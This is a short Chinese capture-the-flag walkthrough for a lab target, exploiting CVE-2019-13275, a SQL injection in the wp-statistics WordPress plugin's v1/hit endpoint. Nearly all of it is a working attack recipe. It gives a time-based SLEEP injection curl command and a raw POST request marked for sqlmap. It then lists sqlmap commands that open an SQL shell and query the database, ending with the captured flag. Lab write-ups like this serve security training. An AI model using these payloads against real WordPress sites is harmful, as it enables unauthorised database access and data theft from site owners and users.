春秋云镜 CVE-2019-13275 WordPress Plugin wp-statics SQLI
靶标介绍
WordPress VeronaLabs wp-statistics插件12.6.7之前版本中的v1/hit端点存在SQL注入漏洞。
启动场景
漏洞利用
exp
php
time curl -X POST 'http://host/wp-json/wpstatistics/v1/hit' --data "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\' UNION ALL SELECT SLEEP(5)-- x"
POST注入请求包
bash
POST /wp-json/wpstatistics/v1/hit HTTP/1.1
Host: eci-2zebfk328mr50v11k7a0.cloudeci1.ichunqiu.com
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Connection: close
wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x'*
保存为1.txt
python3 sqlmap.py -r 1.txt
python3 sqlmap.py -r 1.txt --sql-shell
select flag from flag;
得到flag
flag{a3c98c0e-1022-4214-9092-fb936cf83e6e}